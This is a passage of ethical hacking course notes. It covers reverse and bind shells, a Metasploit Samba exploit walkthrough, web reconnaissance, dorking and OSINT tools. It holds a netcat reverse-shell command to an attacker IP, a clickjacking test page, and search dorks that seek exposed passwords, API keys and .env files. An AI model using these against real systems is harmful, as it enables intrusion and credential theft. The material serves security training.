on the target computer. To launch a bind shell, the attacker must have the IP address of the victim to
access the target computer.
https://notes.anggipradana.com/tutorial/bind-vs-reverse-shell-concept
https://learntheshell.com/posts/bind-shells/
https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/
Key Takeaways:
• Reverse Shells are generally more stealthy and reliable for bypassing firewalls but require the
attacker to be ready and listening.
• Bind Shells are simpler but expose the target and depend on open inbound traffic, which is often
restricted by firewalls.
102/129
Aspect Reverse Shell
Use Cases Preferred when the attacker is behind a NAT, firew
or on a private network, making direct inbound
connections to the attacker impossible.
Setup The attacker runs a listener on their machine (e.g
-lvp <port>), and the target is instructed to conne
back (e.g., nc <attacker-IP> <port> -e sh).
Target Exposure The target machine’s exposure is minimal as it do
not leave an open port accessible to anyone; the
connection is outbound to a specific attacker.
Non-Staged Payloads: A payload that contains everything needed to establish a connection and
gain control, all in one package.
Comparison between Staged and Non-Staged payloads used in penetration testing, especially with
tools like Metasploit:
103/129
Aspect Staged Payload
Reliability Less reliable if the network connection is
second-stage delivery.
Examples - Meterpreter Staged Payload (windows/
reverse_tcp)
- Shell Staged Payload
Resource Efficiency Can be more efficient, especially on con
due to the smaller initial stage.
Use Cases Ideal for advanced attacks requiring flex
Examples in Metasploit
Staged Payload:
Example: windows/meterpreter/reverse_tcp
Process:
2. The stager establishes a connection back to the attacker and downloads the larger stage (e.g.,
Meterpreter).
Non-Staged Payload:
Example: windows/meterpreter_reverse_tcp
Process:
The entire payload, including the reverse shell or Meterpreter, is sent at once and executed.
104/129
In here we will terget the Samba (port: 139,445).
now search for exploit for samba on searchsploit. In here we are working on samba 3.0 and Linux
system (unix)
105/129
Now go to Metasploit Framework and search for
>> msfconsole
We found a exploit which is ('Username' map script ') for samba 3.0
Now Select it
106/129
Now check options
Now exploit
107/129
We got root access
Manual Exploitation
https://github.com/danielmiessler/SecLists
USER_FILE => /usr/share/seclists/Usernames/
Week 08
108/129
38. EHP Web Application Testing Methodology
Recon
Enumeration
Vulnerability Scanning
Now Let’s Start to find out the Bugs in our Target Website
Step 01 —
Footprinting Website
First of all, we would like to footprint of Target website through some reputed methods and
Techniques !!
2. Finding out the X-Ray Vision for my Target Website [ Recommending https://web-check.as93.net/ ]
3. Finding the Geographical Location of the Target [ Tools — Google Earth, Google Maps, Wikimapia ]
109/129
4. Gathering information from Financial Services [ Tools — Google Finance, MSN Money, Yahoo!
Finance ]
6. Monitoring Target using Alerts [ Tools — Google Alerts, Twitter Alerts. Giga Alerts ]
7. Tracking the Online Reputation of the Target [ Tools — Mention, ReviewPush, Reputology ]
10. Footprinting through Social Networking Sites. [ Facebook, Twitter, Linkedin etc ]
11. Collecting Information through Social Engineering [ Collect information about the users and
employees interest , cookies, sensitive information ]
12. Analyze the Directory Structure of the Target Website [ Tools — Httrack ]
13. Find out the Archive and Analyze previous data [ Tools — ViewDns, https://web.archive.org ]
14. Extracting Meta Data of the Public Documents [ Tools — Exitfool, Web Data Extractor, Metagoofil ]
Step 02 —
Now Let’s Recon our Target Website through some Browser Addons !!
1. Finding the Technology which are used to build our Target Website [ Tools — Wappalyzer,
BuiltWith ]
2. Detect the use of JavaScript libraries with known vulnerabilities [ Tools — Retire.js ]
3. Gather Information of Ports, Services and Server and Common Vulnerabilities [ Tools — Shodan ]
Step 03—
Google Dorking
110/129
Online Resource:
– https://github.com/chr3st5an/Google-Dorking
— https://www.stationx.net/how-to-google-dork-a-specific-website/
Step 04 —
Github Dorking
111/129
• FTP Credentials
• Secret Keys [API_key, Aws_secret key, etc.]
• Internal credentials [Employee credentials]
• API Endpoints
• Domain Patterns
- “target.com” “dev”
- “dev.target.com”
- “target.com” API_key
- “target.com” password
- “api.target.com”
https://github.com/random-robbie/keywords/blob/master/keywords.txt
https://gist.github.com/jhaddix/77253cea49bf4bd4bfd5d384a37ce7a4
https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82
https://medium.com/hackernoon/developers-are-unknowingly-posting-their-credentials-online-
caa7626a6f84
https://shahjerry33.medium.com/github-recon-its-really-deep-6553d6dfbb1f
Step 05—
Port Scanning
Now Let’s Scan the Ports of our Target Website through some necessary tools so that we can find out
the way of Attacking !! Haha..
1. Nmap [ https://www.stationx.net/nmap-cheat-sheet/ ]
2. UnicornScan [ https://0xsp.com/offensive/offensive-cheatsheet/ ]
3. Angry IP Scan [ https://0xsp.com/offensive/offensive-cheatsheet/ ]
4. Netcat [ https://0xsp.com/offensive/offensive-cheatsheet/ ]
112/129
Encrypted Ports Peer-to-Peer Ports
6500: Gamespy Arcade 8080: HTTP Proxy (often used for stream
27015: Half-Life
113/129
Step 06 —
Finding DNS Information
1. Dig [ https://sid4hack.medium.com/decoding-dns-penetration-testers-journey-with-
dig-7cb9845e6215 ]
2. DNS Lookup
3. MxToolbox
4. Nslookup
5. Viewdns
DNS footprinting helps in determining the following records about the target
DNS
Step 07 —
Whois Lookup
Find out the Domain’s Information by using Whois Lookup. Link — https://www.whois.com/whois/
Step 08—
WAF Identification
In this case we need to identify our Target website is WAF Protected or Not. That’s why can use 2
different tools to complete the same task.
Wafw00f [ https://github.com/EnableSecurity/wafw00f ]
WhatWaf [ https://github.com/Ekultek/WhatWaf ]
Step 09 —
Shodan Dorking
Shodan is a search engine for Internet-connected devices. It is different from search engines like
114/129
Google and Bing because Google and Bing are great for finding websites but Shodan helps in finding
different things like popular versions of Microsoft IIS, control servers for Malware, how many host are
affected with the new CVEs, which countries are becoming more connected, SSL certificates of the
websites etc.
Step 10 —
Check Security Header Info
Step 11 —
Subdomain Enumeration
Let’s discuss the top 10 subdomain search tools that can help you discover subdomains.
1. Sublist3r [ Python tool that leverages multiple search engines to enumerate subdomains for a
given domain. ]
2. Amass [ Open-source tool for passive reconnaissance that discovers subdomains, IP addresses,
and other related information. ]
3. Subfinder [ Subdomain discovery tool that uses multiple sources, including search engines and
certificate transparency logs. ]
4. Censys [ A search engine that provides access to a large and up-to-date database of internet
hosts, including subdomains. ]
5. Assetnote [ A tool for asset discovery and monitoring, helping with subdomain identification and
tracking changes over time. ]
8. Knockpy [ Python tool that uses multiple sources to gather subdomain information for a target
domain. ]
9. DNSDumpster [ An online tool that provides DNS reconnaissance services, including subdomain
discovery. ]
10. Aquatone [ A tool that helps visualize and gather information about domains, including
subdomains, by combining techniques like screenshotting. ]
115/129
Step 12—
Filtering Live Domains
There is a tool called HTTPX, which is used to check Subdomains are Active or Not and there are
multiple methods to use this tool. We will see the simple method only.
▶ Enumerate/Collect all subdomains using tools like subfinder, assetfinder, Knockpy and haktrails,
etc.
subfinder (https://www.youtube.com/watch?v=UT52zmdTMw0)
assetfinder (https://www.youtube.com/watch?v=YJ-nv758OSQ)
Knockpy (https://www.youtube.com/watch?v=FKhfZaYVO9I)
haktrails (https://www.youtube.com/watch?v=UT72WuKEQKM)
▶ Add all Enumerated/Collected subdomains from different tools in different files into one file with
unique subdomains, that may be subdomains.txt
▶ You’ll able to see the active subdomains only, on which you can start finding bugs and all.
Step 13—
URL Extraction
Httpx
WaybackURLs
Step 14—
Content Discovery
116/129
Httpx
Gobuster
Dirbuster
Step 15—
Finding Parameters
We are going to enumerate a web application to find out hidden parameters of the Target website,
Arjun Tool
ParamSpider
WaybackURL
Step 16—
Sorting URLs
GF tool is a powerful command-line utility that acts as a wrapper around the grep command,
providing additional functionality and convenience for searching and filtering text.
Link — https://github.com/tomnomnom/gf
Step 17—
Automation in Vulnerability Scanning
1. Nessus — Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer
you have connected to a network.
2. Burpsuite — Burp Suite is an integrated platform/graphical tool for performing security testing of
web applications. Its various tools work seamlessly together to support the entire testing process,
from initial mapping and analysis of an application’s attack surface, through to finding and exploiting
security vulnerabilities.
3. ZAP — OWASP ZAP is a penetration testing tool that helps developers and security professionals
detect and find vulnerabilities in web applications.
4. Acunetix — Acunetix is an automated web application security testing tool that audits your web
applications by checking for vulnerabilities like SQL Injection, Cross-site scripting, and other
exploitable vulnerabilities.
117/129
Using Process — https://darkyolks.medium.com/vulnweb-lab-report-an-analysis-of-vulnerabilities-
on-the-web-c33472761913
5. SQLmap — SQLMAP is an open-source penetration tool. SQLMAP allows you to automate the
process of identifying and then exploiting SQL injection flaws and subsequently taking control of the
database servers. In addition, SQLMAP comes with a detection engine that includes advanced
features to support penetration testing.
Step 18 —
Scan Vulnerabilities manually through the testing methods of OWASP Top
10 Vulnerabilities Category.
First of all let’s talk about the Category and Sub categories of the OWASP Top 10 Vulnerabilities
because if you know what are the bugs, then you can exploit those through your own methodologies
of Testing.
• IDOR
• Directory or Path Traversal
• Function Injection
• Privilege Escalation
• Horizontal and Vertical Privilege Escalation
A03: Injection
• Os Command Injection
• SQL Injection
• Cross-Site Scripting (XSS)
• Expression Language Injection
118/129
• XML Injection
• LDAP Injection
• NoSQL Injection
• SSTI
• Security-by-Obscurity
• Session Fixation
• Unintended Functionality
• Use of Hardcoded Credentials
• Weak Error Handling
• Brute-Force Attacks
• Credential Stuffing
• Credential Theft
• Session Hijacking
• Weak Password Policies
• Weak Session Cookies
• Lack of Multi-Factor Authentication (MFA)
• Insecure Session Management
• Insecure Authentication Protocols
• Insecure Password Storage
• User Enumeration
119/129
• Unvalidated Redirects and Forwards
• Unauthenticated SSRF
• Authenticated SSRF
Now you can test your Target website with several techniques to find out the vulnerabilities.
Recommending to follow the related writeups of the vulnerability.
Step 19—
Analyze Vulnerabilities Database.
4. Patchstack — https://patchstack.com/database/
Step 20—
Report Writing
Report Structure:
A security testing report should have a clear and logical structure. Here’s a recommended structure:
a. Introduction: Provide a brief overview of the security testing context, objectives, and report
scope.
b. Methodology: Describe the techniques and tools used to conduct the security testing.
c. Findings: Present the identified vulnerabilities in a clear and organized manner. Use categories
or severity levels to aid readability.
d. Evidence: Include screenshots, code snippets, or any other evidence to support your findings.
f. Conclusion: Summarize the key points of the report and express gratitude to relevant parties.
120/129
Recommending to Follow this way too — https://www.intigriti.com/hackademy/how-to-write-a-good-
report
https://medium.com/@zisansakibhaque/web-application-security-testing-method-5ed53ab7f168
Step-10
Clickjacking
HTTP Headers are a great booster for web security with easy implementation. Proper HTTP response
headers can help prevent security vulnerabilities like Cross-Site Scripting, Clickjacking, Information
disclosure and more.
https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html
For test perpous find programs from the listed sites below.
1. HackerOne
https://hackerone.com/bug-bounty-programs
2. Bugcrowd
https://bugcrowd.com/engagements?
category=bug_bounty&page=1&sort_by=promoted&sort_direction=desc
121/129
3. Bugbase
https://bugbase.ai/programs
4. Intigriti
https://www.intigriti.com/researchers/bug-bounty-programs
To check security header info we can use some websites from search engines.
1. https://securityheaders.com/
2. https://developer.mozilla.org/en-US/observatory
3. https://www.serpworx.com/check-security-headers/
4. https://domsignal.com/secure-header-test
ClickJack script
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<iframe src="https://example.com" width="500" height="500"></iframe>
</body>
</html>
1. False Positive
Definition: A vulnerability is incorrectly flagged as present, but it does not actually exist.
Example: An automated security tool mistakenly identifies a harmless code snippet as a SQL
Injection vulnerability.
Implications: Leads to wasted time investigating non-existent issues, which can slow down the
vulnerability assessment process.
Key Takeaway: Ensure thorough manual validation to avoid acting on false alarms.
2. True Positive
122/129
Definition: A vulnerability is correctly identified as present.
Types:
• Automatically Corrected: The system detects and resolves the issue without human
intervention.
• Manually Corrected: The system flags the issue, and a security analyst confirms and remediates
it.
Example: A scanner identifies and patches a known outdated dependency (automatic) or flags an
XSS vulnerability that a developer confirms and fixes (manual).
Implications: Shows the system is effective in detecting actual vulnerabilities, but manual review
may still be required for thoroughness.
Key Takeaway: Balance between automation and manual validation improves overall accuracy and
resolution.
3. False Negative
Example: An automated tool fails to identify an insecure API endpoint vulnerable to unauthorized
access.
Implications: These are the most dangerous as they provide a false sense of security, leaving
systems exposed.
Key Takeaway: Regularly update tools and perform manual penetration testing to uncover missed
vulnerabilities.
4. True Negative
Definition: No vulnerability is present, and the system correctly identifies that no issue exists.
Example: A secure web application undergoes scanning, and the tool accurately reports no
vulnerabilities.
Implications: Confirms the accuracy of the tool, minimizing unnecessary alerts and providing
confidence in the system's security.
Key Takeaway: Strive for a high true negative rate to reduce false alarms and improve operational
efficiency.
123/129
40. EHP Do’s and Don’ts in Bug Report writing
Cylect is an advanced OSINT (Open-Source Intelligence) tool that leverages AI to streamline the
process of gathering publicly available information. Its primary purpose is to assist cybersecurity
professionals, investigators, and researchers in acquiring actionable intelligence from diverse
sources. Below are some key features and functionalities you might expect from a tool like Cylect:
Key Features:
• Extracts information from websites, social media platforms, and public databases.
• Scrapes data from various forums, blogs, and news outlets.
AI-Powered Analysis:
• Uses machine learning to identify patterns, trends, and anomalies in collected data.
• Offers sentiment analysis for social media content and articles.
Multi-Layered Search:
• Supports deep web and dark web exploration using anonymizing networks like Tor.
• Advanced search capabilities to refine and filter data effectively.
124/129
Data Visualization:
Real-Time Monitoring:
• Includes features to ensure ethical usage and compliance with legal standards.
Report Generation:
• Provides detailed and shareable reports in various formats (PDF, JSON, etc.).
• Includes actionable insights for decision-making.
Applications:
1. Maltego: A comprehensive link analysis tool that can be enhanced with AI modules for advanced
entity analysis.
Website: https://www.maltego.com
2. Social-Searcher: Incorporates basic AI for sentiment and trend analysis on social media.
Website: https://www.social-searcher.com
3. Twint: An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API,
allowing you to scrape a user's followers, following, Tweets and more while evading most API
limitations.
Website: https://github.com/twintproject/twint
Website: https://github.com/ElevenPaths/FOCA
theHarvester
Recon-ng
SpiderFoot
Shodan
Censys
DorkGPT
Site: https://www.dorkgpt.com/
Google Dorking (or Google hacking) is a method of using advanced search operators in Google to
uncover sensitive information, vulnerabilities, or flaws in websites and web applications. These
operators can help find misconfigurations, exposed databases, administrative panels, and other
sensitive data that shouldn't be publicly accessible.
Here are some examples of Google Dorks that can be used to discover potential vulnerabilities in
web applications. Remember, using these techniques for illegal purposes is unethical and often
illegal, so ensure your actions are ethical and within legal boundaries (e.g., authorized penetration
testing or vulnerability scanning).
126/129
Examples
# 7. Search for publicly exposed PHP error messages (may contain vulnerabilities):
inurl:"error_log" filetype:log
# 8. Find exposed sensitive files (like usernames and passwords in text files):
filetype:txt "username" "password"
# 12. Find publicly exposed .env configuration files (often used for environment variables):
filetype:env
# 15. Look for error pages that may provide server details or vulnerabilities:
inurl:"404" intitle:"Not Found"
Extra Links:
Generate Dork
https://www.yeschat.ai/gpts-9t557DT1RUP-GrokGPT
127/129
All GPTs at Instant Access!
Discover and free to try over 10,000 top GPTs directly without ChatGPT Plus
https://www.yeschat.ai/
Link:
https://taranis.ai/
https://www.kali.org/docs/containers/installing-docker-on-kali/
>> docker
Manual Installation of Docker Compose Plugin: If the above steps do not resolve the issue, you can
manually install the Docker Compose plugin:
>> DOCKER_CONFIG=${DOCKER_CONFIG:-$HOME/.docker}
mkdir -p $DOCKER_CONFIG/cli-plugins
curl -SL https://github.com/docker/compose/releases/download/v2.12.2/docker-compose-linux-
x86_64 -o $DOCKER_CONFIG/cli-plugins/docker-compose
Verify Installation: Check the version of Docker Compose to verify the installation:
>> docker compose version
128/129
Now Install TARANIS_AI
https://taranis.ai/docs/getting-started/deployment/
Deployment
How to deploy Taranis AI
Clone via git
Configuration
Copy env.sample to .env
129/129